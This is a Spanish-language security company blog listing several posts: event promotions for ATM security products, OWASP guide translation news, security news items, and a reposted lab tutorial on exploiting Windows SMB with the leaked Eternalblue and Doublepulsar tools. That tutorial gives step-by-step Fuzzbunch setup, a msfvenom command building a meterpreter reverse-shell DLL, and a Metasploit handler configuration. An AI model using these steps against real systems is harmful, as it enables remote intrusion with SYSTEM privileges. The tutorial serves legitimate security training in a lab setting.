Categoría : Seguridad Informática

Inicio/Archivo por Categoría Seguridad Informática

Éxito total nuestra participación en ATMIA Orlando y ATM & Cash Innovation Panamá

Este año tuvimos el gusto de participar en dos oportunidades en los eventos que organiza ATMIA (ATM industry Association) a nivel internacional, el primero fue en Orlando EEUU y este último en la hermosa Ciudad de Panamá.

Tengo que confesar que en ambos eventos lograron cubrir nuestras expectativas y sobre todo pudimos abrir nuevas oportunidades de negocios en varios países que están interesados en nuestras soluciones de seguridad enfocadas en banca.

Durante el evento en Panamá y Gracias a la valoración del público obtuvimos el título de Mejor Conferencia durante el evento y nuestro Booth fue sin lugar a dudas el mas lleno durante los días del evento, con lo cual y fuera de quedar muy satisfechos con los resultados, pudimos comprobar por la respuesta del público y los bancos que nos visitaron, que vamos por buen camino en el desarrollo de nuestras soluciones de seguridad para banca, llamando así la atención de gigantes como Citibank de EEUU.

Lo bueno de estar de expositores locales, fue que pudimos llevar nuestro propio ATM al ATMIA y realizar demostraciones en vivo, sobre los diferentes tipos de ataques que se están realizando sobre los cajeros ATM en diferentes partes del mundo, comprobando así la eficiencia y eficacia de KAS (Krypto ATM Systems) al momento de detectar desde la apertura del ATM, logins correctos o incorrectos, ejecución de nuevos procesos, integridad de archivos, hasta la conexión de cualquier dispositivo USB en el mismo, reportando de manera inmediata y en tiempo real al correo y celular de la persona indicada para atender estos temas y las diferentes respuestas activas que podemos enviar al ATM para bloquear y evitar que el atacante pueda extraer el dinero.

KAS no solamente se ha convertido en la herramienta mas rápida y versátil en la detección de ciberataques a cajeros ATM, otro de los puntos a favor que nos ha permitido abrir rápidamente mercado dentro la industria de seguridad en cajeros ATM, es que es la primer herramienta de este tipo basada en un motor de Big Data, que permite tener dashboards personalizables, a gusto del cliente y con el precio mas económico que cualquier otra solución de seguridad para cajeros ATM del mercado.

Otra de las soluciones que causó un gran impacto, fue Pentest365, un servicio “Cloud Based” (Basado en la Nube), que se encarga de realizar un Pentesting automatizado 24×7 a toda la infraestructura de TI de una organización, sin importar el tamaño o la diversidad de marcas, sistemas operativos, aplicaciones o tecnologías que se encuentren de por medio. Mas adelante tenemos preparado un post completo a este excelente servicio pero si eres curioso, puedes ver mas información desde el sitio web de Pentest365.

Actualmente contamos con oficinas en Panamá, México y Canadá desde donde afrontamos las diferentes líneas de negocio de la empresa con un excelente equipo profesional de Recursos Humanos.

Pronto les informaremos sobre las novedades en las que estamos trabajando y los nuevos países en los que estaremos dando charlas o presentando nuestros productos. Para cualquier consulta pueden escribirnos a info@ehcgroup.io

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

Estaremos en el ATMIA & CASH INNOVATION LATAM

Par los que no están al tanto de que es ATMIA (ATM Industry Association), es uno de los eventos mas grandes a nivel internacional que reúne cada año a cientos de empresas de todo el mundo que trabajan en el mercado de cajeros ATM, desde proveedores de cajeros ATM de las marcas mas conocidas como NCR, Diebold, Wincor, Hayosung, Triton y otras nuevas, hasta proveedores de software para cajeros y diferentes tipos de servicios que generan un valor agregado a los bancos.

En este sentido, la empresa viene desarrollando desde hace dos años, un producto de Ciber Seguridad para cajeros ATM, llamado KAS el cual fue lanzado en ATMIA New Orleans y en ATMIA Orlando durante el 2016 en los EEUU, donde recibimos excelentes comentarios y oportunidades de negocio que nos permitieron extender nuestros servicios hacia el norte del continente americano desde México, Estados Unidos hasta Canadá.

Este mes de Abril del 18 al 20 del presente, se llevará por primera vez en Latinoamérica el “ATMIA & CASH INNOVATION LATAM” y tenemos la suerte de participar nuevamente, pero esta vez como locales en la hermosa ciudad de Panamá en las instalaciones del Trump International Hotel and Tower.

Te invitamos a que participes con nosotros del lanzamiento de algunos de nuestros productos de Ciber Seguridad para Banca y a que participes en la conferencia que daremos “Breaking Multivendor ATM Security“. La conferencia tratará sobre los diferentes tipos de ataques que existen a cajeros Automáticos, tanto remotos, físicos, lógicos y de otro tipo que mostraremos durante el evento. No te la pierdas !!! Miércoles 19 a las 13:30

Estamos llevando nuestro ATM del laboratorio para hacer diferentes tipos de pruebas de ataques como las de malware y que puedas ver como nuestra solución KAS bloquea y alerta en tiempo real, mostrando un dashboard bastante avanzado al cual le hemos agregado mucho I+D.

Otra de las demos que haremos será con nuestro servicio de Pentesting Persistente desde la Nube (Pentest365), para mostrarte que tan fácil es detectar vulnerabilidades de forma preventiva y blindar tu infraestructura tecnológica con auditorias persistentes y monitereo constante 24×7 los 365 días del año.

No olvides pasar por nuestro Stand #27, estaremos regalando unos gadgets buenísimos y podrás probar y ver nuestras soluciones de Ciberseguridad.

 

OWASP Testing Guide v4.0 ahora en Español

Así es amigos, ahora podrán disfrutar de la muy conocida Guía de Pruebas OWASP 4.0 pero en su versión en español, gracias al trabajo y aporte de dos ecuatorianos, Fernando Vela y Roberto Andrade de la Escuela Politecnica Nacional,  que lo compartieron, podemos anunciar un pre-release de esta guía en nuestro idioma.

La versión 4 en español:  OWASP Testing Guide 4.0 en Español

La versión 4 en ingles  OWASP Testing Guide v 4.0

El documento esta dividido por :

  • Introducción al proyecto guía de pruebas de OWASP y el proyecto completo OWASP
  • Marco referencial al framework de pruebas de OWASP
  • Pruebas de seguridad de aplicaciones WEB
    • Introducción y objetivos
    • Pruebas para gestionar la configuración y la implementación
    • Pruebas de Administración de Identidad
    • Pruebas de autenticación
    • Pruebas de autorización
    • Pruebas de administración de sesión
    • Pruebas de validación de entradas
    • Pruebas de manejo de errores
    • Pruebas para Criptografía débil
    • Prueba de la lógica del negocio
    • Pruebas en el lado del cliente
  • Apéndice
    • Apéndice A: Herramientas de prueba
    • Apéndice B: Lecturas sugeridas
    • Apéndice C: Vectores Fuzz
    • Apéndice D: Inyección codificada

Metodología, puntos de control y pruebas de seguridad

Los tests o pruebas se agrupan en 11 categorías para sumar un total de 91 puntos de control:

  1. Information Gathering
  2. Configuration and Deployment Management Testing
  3. Identity Management Testing
  4. Authentication Testing
  5. Authorization Testing
  6. Session Management Testing
  7. Input Validation Testing
  8. Error Handling
  9. Cryptography
  10. Business Logic Testing
  11. Client Side Testing

OWASP tiene su propia wiki, a continuación un enlace, ahí tu puedes encontrar los puntos de control mencionado pero en un listado detallado.

Testing_Checklist

Este pre-relase tiene como con fin solicitar apoyo en la detección y corrección de errores antes de que sea oficialmente integrado al proyecto OWASP, por eso necesitamos tu apoyo si encuentras problemas de traducción por favor notifica a:

Fernando Vela   fercho.vela@gmail.com
Roberto Andrade   robertoandrade533@hotmail.com

Solo especifica el error, la pagina y el párrafo donde la encontraste dicho error de traducción.

Nos vemos pronto con mas novedades sobre el entorno de pruebas OWASP.

 

UN NUEVO TRUCO PERMITE INFECTAR DE VIRUS CON UN SIMPLE DOCUMENTO WORD

Es de sobra conocido que, aunque sea algo difícil comprender, a través de documentos de ofimática tipo Word, Excel y PowerPoint es realmente sencillo infectar un ordenador de virus. ¿Por qué? Porque, entendiéndolo de forma simplificada, en la suite Office hay una función denominada ‘macro’ que permite lanzar sobre cualquier ordenador que ejecute el documento una serie de instrucciones automatizadas, entre las cuales están las correspondientes a una infección de diferentes formas de malware. Y recientemente se ha encontrado un nuevo ‘truco’ que permite burlar la seguridad que impide que esto ocurra.

 Las macros de Microsoft Office vuelven a dar problemas, ahora se pueden ocultar simplemente cambiando la extensión de un archivo

Los programas de Microsoft en el entorno de ofimática manejan varios tipos de extensiones, y en el caso de Word podemos encontrar, entre algunas otras, las extensiones DOCX y DOTX. Las dos anteriores son de documentos ‘simples’, sin macros, luego fiables en tanto que no pueden abrir instrucciones automatizadas en el ordenador. Y hay otras, como DOCM y DOTM, que también corresponden al procesador de textos Word, y que con la letra ‘M’ en su nombre ya indican que contienen macros, luego pueden plantear la duda de si serán maliciosas o no.

Un nuevo truco permite infectar de virus con un simple documento Word

El problema está en que recibir un documento con las extensiones DOCM y DOTM, por no contener macros, hasta ahora no era una práctica de ‘riesgo’, al menos por estas cuestiones. Y ahora sí, porque se ha detectado que, sin editar el archivo, cambiar la extensión de documentos con macros a la de un documento sin macros no es detectado por los programas de Microsoft. Es decir, que podemos recibir un archivo con macros, y que se muestre con la extensión DOCX o DOTX, e igualmente sea abierto por Microsoft Office y ejecutado con sus macros.

Por lo tanto, para los usuarios la única recomendación posible por parte de los expertos en seguridad informática es que deshabiliten la ejecución automática de macros y activen el procedimiento manual para, de esta forma, únicamente habilitar las macros para documentos de fuentes fiables, y en los que no haya riesgo de infección por conocimiento de su origen fiable. Esto para usuarios con versiones desactualizadas, porque Microsoft ya ha introducido el parche correspondiente en su última versión.

Fuente: Cinco Días

DARPA empleará superordenadores para detectar posibles errores de seguridad

En las últimas semanas parece que el gobierno de Estados Unidos está más preocupado que nunca en la viabilidad de sus sistemas de seguridad. Debido a esto no es de extrañar que hayan pedido a la Agencia de Proyectos de Investigación Avanzados de Defensa de Estados Unidos, conocida por todos como DARPA, que investigue su viabilidad y los ponga a prueba para detectar posibles problemas derivados del uso de software y sistemas obsoletos.

Una vez la misión ha sido encomendada a DARPA y, como no podía ser de otra manera, sobre todo gracias los fondos gubernamentales de los que goza, la agencia se ha puesto manos a la obra y su idea radica en poner a trabajar a gran parte de los superordenadores que hay en Estados Unidos para conseguir así localizar y resolver cualquier tipo de problema relacionado con los sistemas de seguridad de cualquiera de sus servicios.

DARPA pondrá a trabajar a los superordenadores estadounidense para encontrar problemas de seguridad en el software de sus equipos

Una vez más, DARPA vuelve a demostrar que, para ellos, una máquina está más capacitada que un ser humano. Para conseguir hacer realidad esto, la agencia acaba de organizar un concurso bautizado como Cyber Grand Challenge que será presentado en la DEFCON, conferencia anula de hackeo. En este concurso, siete egrupo de la academia y la industria medirán sus fuerzas contra siete ordenadores del Pentágono para ver quién tiene mayor capacidad.

Entre los equipos que participarán en este campeonato encontramos nada menos que a los ganadores de una competición previa organizada el año pasado. Tras ganar, estos tuvieron acceso a un ordenador dotado de un procesador de 1.000 núcleos y 16 terabits de memoria. Los enfrentamientos entre humanos y superordenadores se llevarán a cabo sin ninguna intervención humana. El ganador conseguirá un premio de 2 millones de dólares y una invitación para medir sus fuerzas con hackers humanos en la contienda de atrapa la bandera de la DEFCON

Fuente: actualidad gadget

La histórica sentencia que ganó Microsoft para no tener que entregar tus datos privados a las autoridades

Un tribunal de apelaciones en Estados Unidos determinó que las autoridades nacionales no pueden forzar al gigante de la informática Microsoft a entregarles información contenida en servidores alojados en otros países.

La decisión sienta un precedente histórico en materia de protección de la privacidad para servicios de computación en la nube.

“Deja claro que el gobierno de Estados Unidos no puede utilizar órdenesjudiciales en forma unilateral para llegar a otros países y obtener los correos electrónicos que pertenecen a personas de otras nacionalidades“, le dijo a la BBC Brad Smith, presidente y jefe legal de la compañía.

“Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube”, añadió.

Derechos digitales

El caso llegó a los tribunales después de que Microsoft se negara a otorgarle acceso al Departamento de Justicia a un servidor en Irlanda, como parte de una investigación en un expediente relacionado con drogas. Un tribunal en Manhattan le dio luz verde al Departamento de Justicia en 2014. Pero la corte de apelaciones deshizo esa decisión.

Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube” – Brad Smith, portavoz de Microsoft

El Departamento de Justicia rechazó el fallo e indicó que estaba evaluando el siguiente paso.

Si resuelve apelar, el caso caería en manos de la Corte Suprema de Justicia.

Varias empresas, como Amazon, Apple y Cisco, respaldaron a Microsoft en el caso.

Otra de las organizaciones que estuvo de su lado fue el Open Rigths Group, una ONG en Reino Unido que defiende los derechos digitales.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal”, declaró el director legal del grupo, Myles Jackman.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal” Myles Jackman, Open Rights Group

“En consecuencia, los organismos de seguridad de Estados Unidos deben respetar el derecho a la privacidad digital de los ciudadanos europeos y la protección de sus datos personales“.

“Los Estados no deberían ir más allá de sus fronteras simplemente porque creen que, al hacerlo, pueden amedrentar a las compañías”, añadió.

Juego abierto a todos

Microsoft había advertido que permitir que se ejecutara la orden de judicial desataría un “juego abierto”, en el que otros países podían tratar de implementar órdenes similares para acceder a servidores ubicados en Estados Unidos.

Haciéndose eco de preocupaciones ampliamente extendidas en la industria tecnológica, la empresa sostuvo que, simplemente, las leyes estaban demasiado desactualizadas como para resultar efectivas.

Satya Nadella en una aparición pública en San FranciscoEl jefe de Microsoft, Satya Nadella, ha hecho de la computación en la nube y su seguridad el gran foco de la compañía.

La protección de la privacidad y las necesidades de las autoridades a cargo de hacer cumplir la ley requieren de nuevas soluciones que reflejen el mundo que existe hoy, en vez de tecnologías que existían hace tres décadas, cuando se aprobaron las leyes que están vigentes”, señaló la empresa.

Entre los organismos a cargo de velar por la seguridad, el orden y la legalidad hay una preocupación importante acerca de la posibilidad de que el almacenamiento en la red, junto a la encriptación, esté ofreciendo un espacio en el que los criminales pueden actuar a sus anchas.

Los límites de la cooperación

La juez Susan Carney, a cargo del expediente, falló en contra del Departamento de Justicia sobre la base de que la Ley de Comunicaciones Almacenadas (SAC, por sus siglas en inglés) de 1986 limitaba el alcance de las órdenes judiciales aplicables fuera de Estados Unidos.

La juez señaló que esas restricciones son vitales para mantener buenas relaciones con otros países.

Aun más, dijo que hay mecanismos para la cooperación entre naciones el curso de las investigaciones, aunque las autoridades con frecuencia se quejan de que tomar ese camino es más costoso y consume más tiempo.

Una persona usando una computadora
A las autoridades les preocupa que la nube le proporcione un “espacio seguro” a los criminales para operar.

“Ir a tribunales para pedir una orden bajo la SCA normalmente es más rápido que recurrir a los canales internacionales de resolución”, dijo Daniel Stoller, editor legal senior de la firma Bloomberg Law Privacy & Security News.

Stoller señaló que la sentencia original de 2014 interpretó la SCA de manera que favoreciera la visión del Departamento de Justicia. Pero la apelación le dio prioridad a la legislación internacional.

Otro juez involucrado en el juicio, Gerard Lynch, afirmó que la ley de 1986 necesitaba una actualización urgentemente.

“Estoy de acuerdo con el resultado”, escribió.

“Pero no creo de ninguna manera que el resultado debe ser tomado como algo que se convertirá en política racional, ni mucho menos celebrado como un hito en materia de protección de la privacidad“.

Fuente: BBC